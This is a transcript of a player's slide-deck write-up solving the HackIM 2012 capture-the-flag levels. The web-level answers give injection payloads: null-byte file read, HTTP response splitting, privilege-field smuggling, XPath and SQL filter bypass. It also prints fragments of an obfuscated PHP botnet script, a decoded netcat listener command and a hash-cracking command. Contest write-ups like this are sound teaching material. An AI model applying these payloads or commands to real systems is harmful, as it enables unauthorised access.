Upgrade to Pro — share decks privately, control downloads, hide ads and more …

HackIM 2012 CTF

HackIM 2012 CTF

Detailed approach of how i solved all the levels of HackIM 2012 CTF

himanshudas

March 06, 2012
Tweet

Other Decks in Technology

Transcript

  1. My Acknowledgement To: Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh

    K (danny), Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@), Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist), Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian (Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti (adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse (snubs) & Team from Hak5 - Trust Your Technolust #@>_ Rajarajeswari College Of Engineering, Bangalore
  2. Few cheeky lines that will gear up the CTF thrill:

    - Kitne level the, 35 sardaar. - A computer, plenty of time, lots of patience and a challenging CTF, what else does a hacker need to be happy? - Don't cry at the beginning of the CTF. Cry at the end of the CTF. - Unfortunately, no one can be told what the CTF is. You have to see it for yourself - I know why you're playing CTF, Neo. I know what you've been doing... why you hardly sleep, why you live alone and why night after night, you sit by your computer. You're looking for the flag. I know because I was once looking for the same thing. I was looking for an answer. It's the question that drives us, Neo. It's the question that brought you here. You know the question, just as I did. Before everything else, A word, in fact a request: Kindly avoid going through this writeup before you have attempted with your wildest idea, your weird assumptions, your hottest tools, craziest Einstein’s formula, or a logic that never fails. Brief Overview of CTF Layout: CTF was divided into 7 sections, each with 5 levels of challenges. 1. Trivia Levels: Brain-teasers/Riddles 2. Crypto Levels: Mystified ciphers/Substitutions. 3. Programming Levels: Mathematical logic/Hash Cracking. 4. Web Levels: Redirection/ Injection. 5. Reverse Engineering Levels: PE /Apk/Memory Dump. 6. Log Analysis: Analyzing, pcap/scanner generated logs. 7. Forensics Level: Incident Analysis
  3. Trivia Levels Trivia Level 1 Official Hint: N/A Page Source:

    Nothing Interesting Description: This operating system also refers to a 1982 science fiction film, a board game, and a song off the Prodigy B-Side "What Evil Lurks" Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android as the first result. Flag: android Trivia Level 2 Official Hint: N/A Page Source: Nothing Interesting Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets with malicious intent. Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag. Flag: evil bit Trivia Level 3 Official Hint: N/A Page Source: Nothing Interesting Description: This humorous RFC of the Internet Engineering Task Force describes a communication and control protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of typewriters to produce the entire works of William Shakespeare. Analysis: Google search with the keyword “communication and control protocol suite designed for allowing infinite numbers of monkeys” revealed the flag. Flag: RFC 2795
  4. Trivia Level 4 Official Hint: N/A Page Source: Nothing Interesting

    Description: Metasploit was originally coded for what purpose? Analysis: I can remember going through the book “Metasploit Toolkit” where it was mentioned that metasploit was originally started as a network security game. Flag: game Trivia Level 5 Official Hint: N/A Page Source: Nothing Interesting Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to compose commands. Analysis: Google search with the keyword “April 1st 2003 programming language” revealed the flag as whitespace. Flag: whitespace Crypto Levels Crypto Level 1: Ulta Pulta Official Hint: poiuyt Page Source: <! -- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled- keyboard-computer-mirror1_VXLbh_24429.jpg"> --> Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik Analysis: The page source revealed the image of keyboard mirrored. Observing carefully each character in the given string with the keyboard by mapping right side with the left and vice versa. Flag was revealed.
  5. Keyboard Mapping: 3 == 0 - == 2 . ==

    , q == p a == l z == m Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates Crypto Level 2: White Noise Official Hint: Follow the White Rabbit: P (by spnow) Page Source :<! -- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 --> Description: shhhkoinahihai Analysis: First Attempt (leet way): I went through the wikipedia about Whitespace (programming Language) and got and idea that the given whitespace contains tabs and space which must be replaced by 1 and 0. 1. Copied the whitespace to gedit (text editor). 2. Replaced the tabs with 1 and space with 0. 3. Got the following sequence of 0’s and 1’s
  6. 4. Now, this binary sequence needs to be converted into

    something meaningful, therefore , I google for “binary to text translator” and got an online tool at http://home.paulschou.net/tools/xlate/ 5. Translated the binary sequence but to my surprise, I couldn’t get any meaningful information  Where did I have it wrong? Second Attempt (leet way): 6. After I thought, came to conclude, how about replacing tabs with 0 and space with 1? 7. There, got a new sequence, with expectations. 8. Again I used the same binary to text translator, and Voila!!! There was our Flag
  7. Alternate Method: The above method seems to require lots of

    hard work precisely. Thus, we can even solve the above problem with this alternate way: 1. Copy the whitespace to gedit (text editor) and save it. 2. In linux there is a utility called as “tr” utility to translate characters. 3. Type : cat whitespace.txt | tr "\t " "01" at terminal.(Note:there is space after \t) 4. There is our binary sequence; again we can copy it up in the binary to text translator to get the flag. Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304 Crypto Level 3: The Base Test Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ==== Description: N/A Analysis: I went through RFC 4648 twice, but didn’t find anything highly influencing that could eventually get me to the flag. However got a very basic idea about the patterns of various types of base encodings. My assumption on the given string was: - Rot-13 - Reverse - Base64 - Base32
  8. Went past through combinations of several of the above assumptions,

    and finally got the flag with the following steps: 1. Remove = from both the ends of the given string. 2. Reverse the string. “JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRK U4RJ5HU6T2PJ5” 3. Apply base32 decoding “MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======” 4. Again apply base32 decoding with the result on Step 3 , to get the flag. To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html To decode base 32 :http://online-calculators.appspot.com/base32/ Flag: duoTriGeSimalandNgiti Crypto Level 4: Elucidate Official Hint: N/A Page Source :<! -- md5sum: ad4e2705406ef1197f03f93474e30020 --> Description: Elucidate Analysis: Nothing seems to be better than sleeping rather than go on decoding those obfuscated php script. The first laziest thing that I decided to do was to look for an online tool that would do the job without requiring going through several decoding steps. Eventually I came across an online tool: http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html Now back to analysis part again. Let us understand the script in part wise: <? php $vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval ($vaa8089358f2 ("**base 64 encoded string**")); ?> - On the first line, a variable is being set to a string that’s being represented by a mix of hexadecimal (‘\x’) and octal (‘\’) escape sequences. Python uses the same escapes as PHP for hex and octal, so it’s easy to use python shell to see a “normalized” ASCII representation of these strings: Python Shell Below: >>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65" 'base64_decode'
  9. - Next idea was to decode the base64 encoded string.

    - I used the online tool mentioned above and got an unformatted php script. - A quick Google search revealed that there was a php formatter at “http://www.prettyprinter.de” - So by this time I had decoded the base 64 encoded string with proper formatting. - On further analysis found another obfuscated script: @eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc 8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ 8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+ xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8 J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ +yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN 737geMYA9xjMxqCxC")))); - And there was another base 64 encoded string inside it. - Now the online tool comes into play. The above script is of the form: - @eval(gzinflate(base64_decode(str_rot13("base64_encoded”)))); - The output revealed some kind of bot net behavior, however at this point I was least bother about this fact, and kept on observing it. - A quick overview of the output attracted me with following variable: - $_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\ x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x 6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x 65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6 e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74 \150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\1 50\x65\156\x6f\155\x65\156\x61"; - Hoping this would be the final step, I used the python shell, In case if anyone doesn’t have python installed, Google App Engine for python would really be helpful at http://shell.appspot.com/ , or may be there can be multiple ways to decode that  >>>"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\ 156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\ 157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66 \165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76 \151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c \143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"; 'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavin gelucidatedthenormalcourseofthephenomena'
  10. Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandas havingelucidatedthenormalcourseofthephenomena Crypto Level 5: Yeah! As you guessed,

    it’s Steganography Official Hint: Yeah! As you guessed, it’s Steganography Page Source :<!-- Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd --> Description: Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data? Analysis: Close looks with the initials of title “Llun Saving Bank” suggest LSB. I didn’t know much about LSB encoding technique in text; however I have come across one with image in some war-game. I had a look over LSB on wikipedia and got an idea to include the rightmost bit of each character. I converted the given text into binary and whoa, I was left with long list of binary. This was a real challenging job to get the rightmost bit. Therefore a simple python script made my task easier: result = '' ciphertext = '<paste binary here>' for i in range(7, len(ciphertext), 8): result += ciphertext[i] print result Note: My python script assumes the binary with space between each word. Something like “01001000 01110011 00100000…….” And so on. On executing the python script, I was able to get the LSB of each character to which I converted to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text. Flag: Learn howto Hide in Plain Sight
  11. Programming Levels Programming Level 1: ROTOMATA Official Hint: N/A Page

    Source :<! -- We only know the first 6 characters: "Men at" --> Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit Analysis: I really didn’t spend much time on decoding the whole string. Rather analyzed the difference between first three words, and then google for it. M-M=0 e-f=1 n-p=2 space=3 a-e=4 t-y=5 space=6 s-z=7 o-w=8 m-v=9 e-o=10 Hence, the first three words, that I obtained was “Men at some”. After I google it, I got the famous quote by William Shakespeare, which was the flag. Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
  12. Programming Level 2: Pascal’s Triangle Official Hint: N/A Page Source

    :<! -- ex: The sum of all middle terms till first 6 rows is 9 --> Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle Analysis: This seemed to be easy at first sight. My first expectation was to get some cooked up code but that really didn’t worked out, to hell all I got was algorithms and some frustrated guy like me crying on the discussion forums to get their erroneous triangle code worked out. Googled Pascal triangle went through wikipedia about Pascal triangle, wolframalpha- Pascal triangle, Frustration takes you at any height of paranormal activities. After spidering and crawling through the links, came across some useful resources: http://rosettacode.org/wiki/Pascal's_triangle http://www.mathsisfun.com/pascals-triangle.html http://www.mathwords.com/b/binomial_coefficients_pascal.htm http://www.youtube.com/watch?v=OMr9ZF1jgNc -. So all up, time to do some serious coding. - The challenge considers the middle term of odd rows. - Wrote a code on c and hoped it would worked out, failed  - Looked for some java code, compiled successfully, but when I executed it, I was staring on my LCD, the program went on running for more than 30 seconds on my i5, that was stack overflow. - Time for some manual again, overlooked and realized that binomial coefficients can be essential to get me the flag. - Worked out again for the 3rd time now in python, with unexpected hope, executed it got something, and voila!!! that was the flag, This was the python script: #!/usr/bin/python from math import factorial p = 0 s = 0 for n in range(0, 1337, 2): s += factorial(n)/(factorial(p)*(factorial(n-p))) p += 1 print s Flag:4365932474188423707093600683230364311423941198777278660206654343120587216 667436233239359631257671906424254797004032326756653034333310397082007259357870 623427662432460587818667097226705645987145656659456934356498862160032628647508 069786551862253737753435645565104842509752373488183866315706330467111008238321 829445373767874422156015835789685633070319435688289548287438365157627110284786 6170999680296497
  13. Programming Level 3: Your Brainfuck Sir... Official Hint: N/A Page

    Source :<! -- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d --> Description: Debug bfcode to get the flag Analysis: I had encountered brainfuck earlier but never this way. A Google search for brainfuck interpreter resulted in http://www.iamcal.com/misc/bf_debug/ . Executed the given code without any input in the interpreter and observed the result. Something appeared partially which doesn’t seem to throw any useful meaning. Tried with some random input and got the same output again and again. May be defect with the interpreter, LOL. It’s MANUAL time now. Glanced across the lines in wikipedia about the brainfuck programming. There I got to see the small “Hello World” program. I executed it in the interpreter, and got the output successfully. Observed the “Hello World” in brainfuck where each line was ending with a period. Period has a special meaning in brainfuck programming. It is same as print statement which the given brainfuck code was missing.GOT IT!!! So appending a period at the end of each line was all about getting the flag. Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you.. Programming Level 4: Substitute Problem Official Hint: N/A Page Source :<! -- md5sum: 31178aa23ef43566009d97f38a470279 --> Description: deobfus Analysis: There wasn’t much to do with this; everything was self explanatory in the page itself. The only thing required with this challenge was plenty of time with lots of concentration.For me, It nearly took continuous 2 hours to get through all the iteration. Probably some hardcore programmer would have written a simple code to get it done in few seconds. So mine time complexity with this problem was exponentially equivalent to one with the programmer’s. Final iteration revealed the code as: S E D U L o U S L Y E S C H E w o B F U S C A T o R Y H Y P E R V E R B o S I T Y A N D P R o L I X I T Y 8 4 R o E D Y GREEN On attempt with variation of case, got the final flag. Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
  14. Programming Level 5 Official Hint: N/A Page Source: Nothing Interesting

    Description: A pinch of salt for your coffee, Sir? Analysis: I’m really bad at brute forcing and guessing un-natural passwords. With hope to get it correct this time, I went to salt.asp page and generated hash for few random keywords. Sorry wouldn’t share those, crazy ones, nearly killed my system with overheating: D The basic idea was to crack the hash and identify the salt which was the flag to complete this challenge. I looked around for the md5 cracker and got one at http://3.14.by/en/md5. Next i tried to crack the hash for the random keywords. After a while, my system temperature went above critical level and had to shutdown the process, that was really disgusting job to watch over the LCD and wait for the cracker to do its job, the cracker doesn’t seems to understand that my system is not a blade server or may be I don’t. On a final note, I decided to take hash for either single word or digit and crack it. Again the same boring task, at first set I generated the hash from 0-10, and finally on second attempt with the hash for “1” I got my flag. Working Steps: 1. On the page salt.asp input password as 1. 2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31” (Note: each system will generate a unique hash). 3. Fire up the windows console , and type the following at the command prompt: barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a 4. After approx 2 minutes on my i5, the cracker successfully displayed the result.
  15. 5. There we had our key as : “1c183e7” 6.

    That means "1" + "salt("c183e7"). Since hash = Algo(password+salt) 7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31=md5(1+c183e7) 8. And finally my flag was c183e7( Note: Each system will have a unique flag) Flag: c183e7 Web levels Web Level 1 Official Hint: N/A Page Source: Nothing Interesting Description: Can you view the bytes in password.asp from Me? Analysis: As the description suggests, it was null byte injection. I had come across a problem on null byte on one of the wargame.Let’s understand the problem. Our challenge was to read the information from the file password.asp which somehow was protected by the server. Here we can observe in the given URL that default parameter is test.txt, Multiple questions can arise here, as such, why only test.txt as the parameter? If you don't do anything with a parameter, why take one? Assume a real time application from my perspective, the idea with this level is that: We have an application which takes a filename from us, reads it, and shows it to us. We found an example of input, "test.txt".We know there is sensitive information in password.asp, But we can't get password.asp. So let's imagine that whoever wrote this application which reads any file we tell it to, wanted to keep us from reading anything but files which end in ".txt".So any input which we give it that doesn't end in ".txt" is rejected. So here's the problem: How do we get a file which ends in ".asp" when the filename we provide has to end in ".txt"? The answer obviously is null byte but that would be a partial answer in the context of the question “HOW?” In languages like ASP and PHP, the null byte doesn't end a string, it’s just another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if we give a PHP script a filename to open that has a null byte, it's different in PHP and in the OS. So the filename might be "hello%00blah" to PHP. But it would be "hello" to the operating system. Some applications append a file extension to the end of any filename we give them. So we give them "hello" and they open "hello.txt" .Which is why we do “hello.php%00”. Because PHP sees "hello.php%00.txt" and the OS sees "hello.php". And after this long boring, worthless explanation, hence the flag. Flag: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=password.asp%00.txt
  16. Web Level 2: Official Hint: Judgment of Solomon Page Source:

    Nothing Interesting Description: Can you redirect ME to hackim.null.co.in? Analysis: I had to go through the hint to get this one done. After few attempts with variation of parameters, arbitrarily I had to go through the boring story on wikipedia. The summary of story was, “Solomon suggested that the baby be split in half and each half given to one of the women claiming to be the mother”. So, the hint refers to the word "split". On quick search with the string “HTTP Splitting” returned several results. Studied few of them, showing various PoC’s and realized that I had spent most of my time injecting the http response rather than redirecting it. Hence finally I got the level done with several parameter variations. Flag: http://www.nullcon.net/challenge/wlevel-2- proc.asp?page=%0d%0aHTTP/1.0%20302%20Found%0d%0aLocation:%20hackim.null.co.in =========================================================================================== Web Level 3: Official Hint: Proxies are golden friends Page Source :<! -- If you're still reading, better register Mate :)--> Description: Click here to Login || Click here to Register Analysis: In this level we were entertained with two options, register and login.I clicked on both of them and went through the page source, nothing seemed interesting. Had a thought that it could be vulnerable to some kind of injection. On next step I filled up the form and register, Wow my registration my successful, didn’t expected though.But on login with those credentials all I got was an error message “Only ADMINS are Welcome!”.Came back again on the registration page and tried with another input. There I observed the page source, and cool there we had something interesting this time, in this format: <!--Debug Info: INSERT 'uname|pass|uname|[email protected]|admin:no|comment:new user' INTO USER DB FILE --> So, it was all here, the parameter with admin:no was passed into the database. Now there was not much to do, next I used burp suite to check how the parameter were passed.
  17. On the last line we can observe inside the window

    how parameters are passed to the server. This format was similar to earlier as what we got on the post registration page source. So all we had to do was add admin:yes as per the format. Even this process annoyed me a lot, since on single attempt I couldn’t get it correct. So, the correct format was: username=me.admin&name=admin&password=admin&email=admin%40localhost.com|admin:yes&Submit=Register And finally I registered myself as the admin, and got the flag. Flag: b3149ecea4628efd23d2f86e5a723472
  18. Web Level 4: Can You Get Me all the Data?

    Official Hint: if you think you've seen all the data, i'm afraid you're mistaken Page Source: Nothing Interesting Description: 2007 && 2002 Analysis: At the beginning of this level, I was getting no idea at all for what really was required with it. After hovering with the links around for few hard hours, I got a cool link on OWASP: https://www.owasp.org/index.php/Interpreter_Injection There were few interesting attack vectors which foolishly I tried, in vain had no luck. I noticed the description again and understood it was asking to reveal data from the server and then I realized that blindly I tried with those injection parameters. On my next attempt I went on looking for cheat sheet on various attack parameters. I collected few of them and studied those. Those were beyond my understandings. Helplessly shouted in the IRC and got some clue, clue which again required traversing blindly. Eventually I came across an article: http://palpapers.plynt.com/issues/2005Jul/xpath-injection/ which described xpath injection is simple understandable language and then a good cheatsheet over here: http://www.simple-talk.com/dotnet/.net-framework/xpath,-css,-dom-and-selenium-the-rosetta- stone/ I tried with those attack vectors, and got the flag unexpectedly with this one: input='] | /* | /foo[bar=' I completed this level blindly, a bad one. Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear Web Level 5: Official Hint: It’s SQLi Page Source: Nothing Interesting Description: Do You Have What IT Takes to Break into the World's Most Secure Login System? Analysis: The very first thing anyone would try out after looking at the page at one sight was the very common SQL Injection (“ or 1=1--) and yes I was on the same side of the coin. As usual I was wrong again. Assuming it to be a blind SQLi, looked around www.1337day.com and www.exploit-db.com in hope of getting some good papers. On the very first link of exploit-db I got to see a paper on advanced blind sqli, went through it and there was some attack vectors against web firewalls. With positive hope tried and with the second attempt using '<>'1 as the username and password made it to the flag. Flag: 47c1b025fa18ea96c33fbb6718688c0f
  19. Reverse Engineering Levels Reverse Engineering 1: Basic Test Official Hint:

    N/A Page Source: <!-- md5sum: 9d428bdcb07127ff4358f7d487445470 --> Description: justdoit.exe Analysis: The given binary seemed to be suspicious. So before executing it I decided to analyze and verify if it was safe to execute. I dumped the binary into hex editor and observed it. The headers showed that it was UPX packed. I unpacked it using “Universal Extractor” and went through it again, no conclusion, finally executed it inside the vmbox and analyzed the behavior. At first instant I couldn’t get anything from it, executed it few more times and saw automation done by the exe. Then I went to google and searched for the string “keyboard automation” and there first option showed AutoHotKey.Eventually ended up looking for Exe2Ahk at http://www.autohotkey.com/download/Exe2Ahk.exe After successful decompilation, found the flag in plain text. Flag: We could talk all day about what AutoHotKey can do for an online poker player Reverse Engineering 2: Ask nicely, it will give you what you want Official Hint: Take another path.. in general look for interesting code blocks & execute them.. code can be anywhere in the PE, even in data | Resource? No Resource Page Source :<! -- md5sum: c786287c7825784a85413695a9e319fc --> Description: HackIM.exe Analysis: I consider this as the most insane level in the whole CTF competition. Nearly spent two hacking days to get past through it. To understand the binary, I nearly downloaded all the tools found in google having the string “PE”, went through various articles on Reversing PE, and nothing worst than that shifted to 3 different debuggers one bye one. Ultimately after tracing the flow of program for several times in the Olly debugger, following steps concluded the flag: 1. As the hint was suggesting, “No Resource “, I loaded the PE into Resource Hacker to see if what exactly its meaning was. Encountered the following error.
  20. So it was clear from this error that, there was

    something wrong with the resource section. 2. I turned up into Olly debugger, loaded the PE and went to the memory window (ALT+M). 3. At offset 0040C000, there was the .rsrc (resource) section. I changed the access to the section from Read to Full Access. 4. Tried running the program but couldn’t get anything desired. Popped over the hint again and there it was asking to execute the resource section. 5. So now it was time to place the jump instruction somewhere so as to execute the resource section.Came back to CPU window (ALT+C). 6. Just below the program entry point, at offset 00401273 there was a JMP instruction.
  21. 7. So all I had to do was place the

    jump over the resource section which was the offset address 0040C000. 8. And finally running the program I got the flag in the messagebox. Flag: AreYouHappyNow?
  22. Reverse Engineering 3: null Mobile Android App Official Hint: N/A

    Page Source :<! -- md5sum: fd81ba87c0edc1f37250e680a49260d8 --> Description: We’re proud to announce the null Mobile Android App Project; however the application is currently in Beta Phase and requires lot of attention from the testers. In keeping with the spirit of HackIM we've hidden a Flag inside. Your task is to find the Flag. Analysis: I didn’t have much hard time with this one as of before. I unpacked the apk file with Winrar and went through the contents. Inside folder res>raw there were two files code.js and junk.php. The JavaScript inside code,js was in unformatted state. I formatted it using http://www.jsbeautifier.org and went through it, couldn’t get anything interesting. Next opened the junk.php file in Ultraedit and after a careful observation there at line 72 I got to see the packed javascript function, finally an online tool at http://www.strictly-software.com/unpacker helped me to unpack the javascript function, revealing the flag inside it. Flag: Do not let what you cannot do interfere with what you can do. Reverse Engineering 4 Official Hint: we’ve updated the binary with hints, request all to download again to proceed Page Source: <! -- md5sum: 7c87b2bfe4e02dbb32e2c3067cb93692 --> <! -- <center><h3><a href="data/script">script</a></h3></center> <! -- md5sum: 849f2d8c6e22604cba8fe4904803de10 --> Description: REL4 UPDATE: WE have updated the binary with some hints inbuilt, Request all to download new RE binary to proceed. Analysis: My first attempt with the given file was to analyze its type. I used the file identifier called TrID File Identifier also available online at http://mark0.net/onlinetrid.aspx. The result showed up that it was an ELF binary. So I cross verified it on the terminal:
  23. It showed up that the binary was stripped. Tried executing

    it and was entertained with the following error. I tried with strace and ltrace command but couldn’t learn much from those outputs. The error indicated something about time machine, so I turned up in google and looked for anything interesting on time machine, however couldn’t find anything to help. The next thing I did was to change the system date to some back year. I changed it to year 2000. Tried executing the binary again, and voila there was no error but even no flag. Tried giving some parameter but that too didn’t help anything. Next I opened the new terminal and tried looking into the current processes running using the command ps –aux and got a long list. It was difficult to figure out so again tried filtering it using the command: ps –aux | grep script2 and whoa, unexpectedly got to see the some shell script. Went through it, and there our flag was in plaintext. Flag: Nature has neither kernel nor shell; she is everything at once Reverse Engineering 5: Got Dumped :( Official Hint: Page Source :<! -- md5sum: 043e4cc85c519723fad18dce7502371c --> Description: lol.rar Analysis: This challenge was about the crash dump analysis. I opened it in hex editor and went through the few lines got an idea that it was a windows crash dump. Next I installed Windbg with proper symbol configuration and loaded the dump into it.I was unaware of any such analysis and went through few links on google. Got some good information and few cheatsheets. Ultimately the following steps help me to understand the dump. 1. First we had to recognize the file that caused the crash. Command: !analyze –v showed u that stub.exe caused the crash. 2. Next we had to extract stub.exe from the dump to analyze it.So for this there is a sos which is used for .NET debugging( to dump dll and exe). 3. .load clr10\sos.dll 4. !sam folder_location 5. Now we had stub.exe. Next I loaded the stub.exe into Olly dbg. Step into the instruction and realized that the jump was passing to the crash portion of the assembly. Tried to bypass it by jumping it to the messagebox function. I got the messagebox but there was no flag in it. Again went back to windbg and checked for the PID since there was a GetProcessID function in the assembly. I got the PID as 0xA60 then I patched the GetProcessID to return 0xA60 and finally got the flag.
  24. Flag: TheLastSamurai Log Analysis Log Analysis 1: Basic Official Hint:

    N/A Page Source :<! -- md5sum: 1e2612e8ff3d4651c7d5fc67f2797906 --> Description: report Analysis: In this challenge the log was not too large but took a long time to understand. Every line had a cool piece of information. On carefully observing through the lines, I found something very interesting on line number 31: + OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is enabled: /challenge/logically_insane/ Checked into it and wow found two files, but at the very next moment, realized that the game is still on. Said “Ask the proper question to get the proper answer”. Went on the page source and got some more closer to the flag, there was a hint given on comment: <!-- askmelater.asp?question=? --> And to my surprise with my very first guess, I got the flag. HAPPY!!! The final URL was: http://nullcon.net/challenge/logically_insane/askmelater.asp?question=flag Flag: 6bb61e3b7bce0931da574d19d1d82c88
  25. Log Analysis 2: Mystery Password Official Hint: N/A Page Source:

    <!-- md5sum: 6eebd22df057377a436dad2d97fad8b6 --> Description: log3.pcap Analysis: There wasn’t much in this challenge. The log was unexpectedly small and within few minutes anyone could solve it. I opened the log in wireshark. The easiest way was to learn the log was to see the TCP stream. Right Click on the log window > Follow TCP stream, popped up the TCP stream window. The very last line of the stream content revealed the password and with next few attempts I got the flag. Flag: [email protected]
  26. Log Analysis 3: Clever Intruder Official Hint: N/A Page Source

    :<!-- md5sum: 396df3308184a77890cb708f05915f29 --> Description: access.rar Analysis: A 25MB log with approx 1 lakh lines. Seemed nearly impossible to analyze it, so thought for a while and looked around google for some good log explorer so as to make task easier, got few but they were all useless, I wasted my time, came back to my old favorite Ultraedit and gave a quick glance through the lines. Learnt from the logs that: - Logs were generated from different scanners. - There was variation in IP. - Scanning was performed on same date between fixed period of uninterrupted time. - The HTTP Status Code for most of the request was 404. Hence the last finding proved to be essential. Assuming we couldn’t find anything interesting from a “Page Not Found” error. I tried my level best to separate all those logs to different tabs in ultraedit.This was really a very hectic job, had I got some more knowledge wouldn’t be tough to get past this hurdle easily. This level really made me realize how poor I m.After a long hours of assumed work, eventually came across the line with an encoded base64 string “bmMgLWwgLXAgNjY2Ng==” and on decoding got “nc -l -p 6666”. On the original log, this was on line number 37409 (Ultraedit). Flag:
  27. Log Analysis 4: Official Hint: Exploited!!! Page Source :<!-- md5sum:

